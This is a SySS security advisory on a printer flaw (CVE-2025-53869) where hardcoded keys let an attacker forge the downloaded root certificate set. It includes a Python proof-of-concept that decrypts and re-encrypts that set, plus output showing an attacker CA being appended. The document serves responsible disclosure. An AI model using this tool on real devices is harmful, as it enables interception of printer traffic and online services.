-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2025-007 Product: Multiple products are affected (see [1], [2], [3]) Manufacturer: Brother Industries, Ltd., Konica Minolta, Inc., Ricoh Company, Ltd. Affected Version(s): Versions depend on the vulnerable product and vendor (see [1], [2], [3]) Tested Version(s): 1.17 of the Brother HL-L2400DW Printer Vulnerability Type: Improper Certificate Validation (CWE-295) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2025-02-13 Solution Date: 2026-01-29 Public Disclosure: 2026-01-29 CVE Reference: CVE-2025-53869 Author of Advisory: Jan Wütherich, Albstadt-Sigmaringen University ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Brother HL-L2400DW Printer is a laser printer with networking capabilities. The manufacturer describes the product as follows (see [4]): "The HL-L2400DW is designed to increase efficiency, with fast print speeds helping you to work smarter. The 2-sided print feature saves you time, enabling you to get on with other tasks. Make your day easier and your printing effortless, with simple set up and 5GHz WiFi or USB connection. This efficient HL-2400DW is a breeze to operate using the easy to navigate control panel." Due to the use of a hardcoded cryptographic key and no verification of data authenticity, an attacker with the capability to intercept network connections between the printer and a remote server could replace the remotely fetched root certificate set with attacker-controlled certificates. By modifying root certificates, an attacker could intercept and extract communications from Brother online services, such as Email Print. While SySS verified the vulnerability for the Brother HL-L2400DW Printer with firmware version 1.17, multiple devices from multiple manufacturers are affected by the same issue (see [1], [2], [3]). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The Brother HL-L2400DW Printer retrieves a set of root certificates from a remote server at every boot and stores them in memory. It periodically checks the server for a newer version of the certificate set and downloads a newer version if available. This connection is made using HTTPS, but the server certificate is not verified. This is likely because the device does not store any root certificates when the certificate set is initially retrieved or because the current certificates might already be expired or revoked. The certificate set is encrypted with AES-256-CBC, with an appended HMAC-SHA256 over the encrypted data. Since both encryption and HMAC operations are symmetric, an attacker with access to the keys can encrypt and generate a valid HMAC for their own certificate set. These keys are identical across all devices and can be extracted from the disassembled firmware. Thus, an attacker with the capability to intercept network connections could replace the root certificate set retrieved from the remote server with a custom one. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following proof-of-concept software was developed to decrypt and encrypt certificate sets. The required cryptographic material was manually extracted from the disassembled firmware. #!/usr/bin/env python3 from Crypto.Cipher import AES from Crypto.Util.Padding import pad, unpad import hmac import hashlib import argparse import keys def decrypt(source, dest): with open(source, "rb") as f: data = f.read() body = data[:-0x20] expected_hmac = data[-0x20:] h = hmac.new(keys.HMAC_KEY, body, hashlib.sha256) if h.digest() != expected_hmac: raise Exception("[-] Expected HMAC does not match!") print("[+] Decrypting certificate file") cipher = AES.new(keys.CERT_KEY, AES.MODE_CBC, iv=keys.CERT_IV[:16]) decrypted = unpad(cipher.decrypt(body), 16) with open(dest, "wb") as f: f.write(decrypted) print("[+] The certificate file was successfully decrypted") def encrypt(source, dest): with open(source, "rb") as f: data = f.read() print("[+] Encrypting certificate file") cipher = AES.new(keys.CERT_KEY, AES.MODE_CBC, iv=keys.CERT_IV[:16]) encrypted = cipher.encrypt(pad(data, 16)) print("[+] Generating HMAC") h = hmac.new(keys.HMAC_KEY, encrypted, hashlib.sha256) with open(dest, "wb") as f: f.write(encrypted) f.write(h.digest()) print("[+] The certificate file was successfully encrypted") if __name__ == "__main__": parser = argparse.ArgumentParser() subparsers = parser.add_subparsers(dest="mode") subparsers.required = True decrypt_parser = subparsers.add_parser("decrypt") decrypt_parser.add_argument("source", help="Source filename") decrypt_parser.add_argument("dest", help="Destination filename") encrypt_parser = subparsers.add_parser("encrypt") encrypt_parser.add_argument("source", help="Source filename") encrypt_parser.add_argument("dest", help="Destination filename") kwargs = vars(parser.parse_args()) globals()[kwargs.pop("mode")](**kwargs) After decryption, the file contains multiple PEM-encoded root certificates, beginning with the following certificate and followed by several others: - -----BEGIN CERTIFICATE----- MIIEADCCAuigAwIBAgIBADANBgkqhkiG9w0BAQUFADBjMQswCQYDVQQGEwJVUzEh MB8GA1UEChMYVGhlIEdvIERhZGR5IEdyb3VwLCBJbmMuMTEwLwYDVQQLEyhHbyBE YWRkeSBDbGFzcyAyIENlcnRpZmljYXRpb24gQXV0aG9yaXR5MB4XDTA0MDYyOTE3 MDYyMFoXDTM0MDYyOTE3MDYyMFowYzELMAkGA1UEBhMCVVMxITAfBgNVBAoTGFRo ZSBHbyBEYWRkeSBHcm91cCwgSW5jLjExMC8GA1UECxMoR28gRGFkZHkgQ2xhc3Mg MiBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTCCASAwDQYJKoZIhvcNAQEBBQADggEN ADCCAQgCggEBAN6d1+pXGEmhW+vXX0iG6r7d/+TvZxz0ZWizV3GgXne77ZtJ6XCA PVYYYwhv2vLM0D9/AlQiVBDYsoHUwHU9S3/Hd8M+eKsaA7Ugay9qK7HFiH7Eux6w wdhFJ2+qN1j3hybX2C32qRe3H3I2TqYXP2WYktsqbl2i/ojgC95/5Y0V4evLOtXi EqITLdiOr18SPaAIBQi2XKVlOARFmR6jYGB0xUGlcmIbYsUfb18aQr4CUWWoriMY avx4A6lNf4DD+qta/KFApMoZFv6yyO9ecw3ud72a9nmYvLEHZ6IVDd2gWMZEewo+ YihfukEHU1jPEX44dMX4/7VpkI+EdOqXG68CAQOjgcAwgb0wHQYDVR0OBBYEFNLE sNKR1EwRcbNhyz2h/t2oatTjMIGNBgNVHSMEgYUwgYKAFNLEsNKR1EwRcbNhyz2h /t2oatTjoWekZTBjMQswCQYDVQQGEwJVUzEhMB8GA1UEChMYVGhlIEdvIERhZGR5 IEdyb3VwLCBJbmMuMTEwLwYDVQQLEyhHbyBEYWRkeSBDbGFzcyAyIENlcnRpZmlj YXRpb24gQXV0aG9yaXR5ggEAMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQAD ggEBADJL87LKPpH8EsahB4yOd6AzBhRckB4Y9wimPQoZ+YeAEW5p5JYXMP80kWNy OO7MHAGjHZQopDH2esRU1/blMVgDoszOYtuURXO1v0XJJLXVggKtI3lpjbi2Tc7P TMozI+gciKqdi0FuFskg5YmezTvacPd+mSYgFFQlq25zheabIZ0KbIIOqPjCDPoQ HmyW74cNxA9hi63ugyuV+I6ShHI56yDqg+2DzZduCLzrTia2cyvk0/ZM/iZx4mER dEr/VxqHD3VILs9RaRegAhJhldXRQLIQTO7ErBBDpqWeCtWVYpoNz4iCxTIM5Cuf ReYNnyicsbkqWletNw+vHX/bvZ8= - -----END CERTIFICATE----- - -----BEGIN CERTIFICATE----- MIIDxTCCAq2gAwIBAgIQAqxcJmoLQJuPC3nyrkYldzANBgkqhkiG9w0BAQUFADBs ... The following output demonstrates the process of decrypting the original certificate set, appending a custom certificate authority, re-encrypting the certificate set, and updating the HMAC: $ python ./certfiletool.py decrypt ./certfile ./certfile_decrypted [+] Decrypting certificate file [+] The certificate file was successfully decrypted $ cat ./root.pem >> ./certfile_decrypted $ python ./certfiletool.py encrypt ./certfile_decrypted ./certfile [+] Encrypting certificate file [+] Generating HMAC [+] The certificate file was successfully encrypted After adding the attacker's certificate to the printer's root certificate bundle, machine-in-the-middle attacks against the TLS-based communication between the printer and remote servers are possible. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update to the latest firmware version of the affected device (see [1], [2], [3]). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2025-01-09: Vulnerability discovered 2025-02-13: Vulnerability reported to manufacturer 2026-01-29: Patch released by manufacturer 2026-01-29: Public disclosure of vulnerability by manufacturer 2026-02-02: Public disclosure of vulnerability by SySS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Affected Brother Industries, Ltd. devices https://faq.brother.co.jp/app/answers/detail/a_id/13716 https://faq.brother.co.jp/euf/assets/pdf/13716%E2%80%9720260128.pdf [2] Affected Konica Minolta, Inc. devices https://www.konicaminolta.com/global-en/security/advisory/pdf/km-2026-0001.pdf [3] Affected Ricoh Company, Ltd. devices https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2026-000001 [4] Datasheet for HL-L2400DW https://www.brother.eu/-/media/Product-Downloads/Devices/Printers/HL/HLL2400DW/HL-L2400DW---Datasheet.ashx [5] SySS Security Advisory SYSS-2025-007 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-007.txt [6] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was discovered by students of the Albstadt-Sigmaringen University in cooperation with SySS GmbH. Jan Wütherich - jan[at]wuetherich[dot]de, wuetheja@hs-albsig.de Manuel Schuttenberg - manuel[at]schuttenberg[dot]net, schuttma@hs-albsig.de Simon Häupler - haeuplsi@hs-albsig.de Marvin Härter - haertema@hs-albsig.de Silas Feuerherdt - feuerhsi@hs-albsig.de Timm Ditz - ditztimm@hs-albsig.de Saeed Brezek - brezeksa@hs-albsig.de Supervised by: Simon Malik - maliks@hs-albsig.de Prof. Holger Morgenstern - morgenstern@hs-albsig.de Contact SySS GmbH: E-Mail: anton.fabricius@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Anton_Fabricius.asc Key ID: 0xB2ED52BF0DEAC709 Key Fingerprint: 3476 F352 EBC1 F702 5048 B573 B2ED 52BF 0DEA C709 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEENHbzUuvB9wJQSLVzsu1Svw3qxwkFAmmAnLwACgkQsu1Svw3q xwmTqQ//eA6c+GLYFkHdjiJpx5EI8y5/VJ/A9261fF+rvlAttEzEjuiIM1w+A/1a TBrEf+s+JyUxtE68YixD60yM/sieOVvRBre4lnCRLK8/PviH3KK+VPqzEIjpksrq /rzwgvwF1eonZDc+WWd7Tvg6wu4wxRX4zZ6+HUplxjl0PuWf73Q9fhmJEPAgtONK JfioE7lPV5bkEhbQEF+3VpeNrBgoAHfNmE83/AtmPfuwRSGcJRht7nzaRQQsGE8u yZ5J7orcHqIRQMY+band5YaSO4GftIaK67YwePlQzyYBpWdy2PcFIl/TFH2GyzRI UROTEiO5pfBVB7SJ/kv4lqTID6Ax0mc6RCsU0aasvv9kLvgrLkeOH7c0ILqqOwLu mq3Euaf/pyFyODLrj3noHD+tfT4LuFBA3V4vNBeX5opWhxTToGJNACJioIzJSkf0 uqdr8+WOxYkVnpeNSW6X8ZqqFNQChbpAMuA7Ohz2w67oJcELZfY8aRp00wi5c/qx LCvlKVeRMFlPEs01UPJsOK9V5sDE6C2xk7ypOzArnMMBQqw73SUBu30JugBS5kNG YygSuHlXDglX4MW3cytJnbuNktvSBgd3Bu58uZGi/USmxJ/wqwYTNsLnnPFt628c ryR7tjqxcme/VcQSU7BGqXlp5GdJjyHQ2SSloOA7m53lSVDjMj0= =xHUQ -----END PGP SIGNATURE-----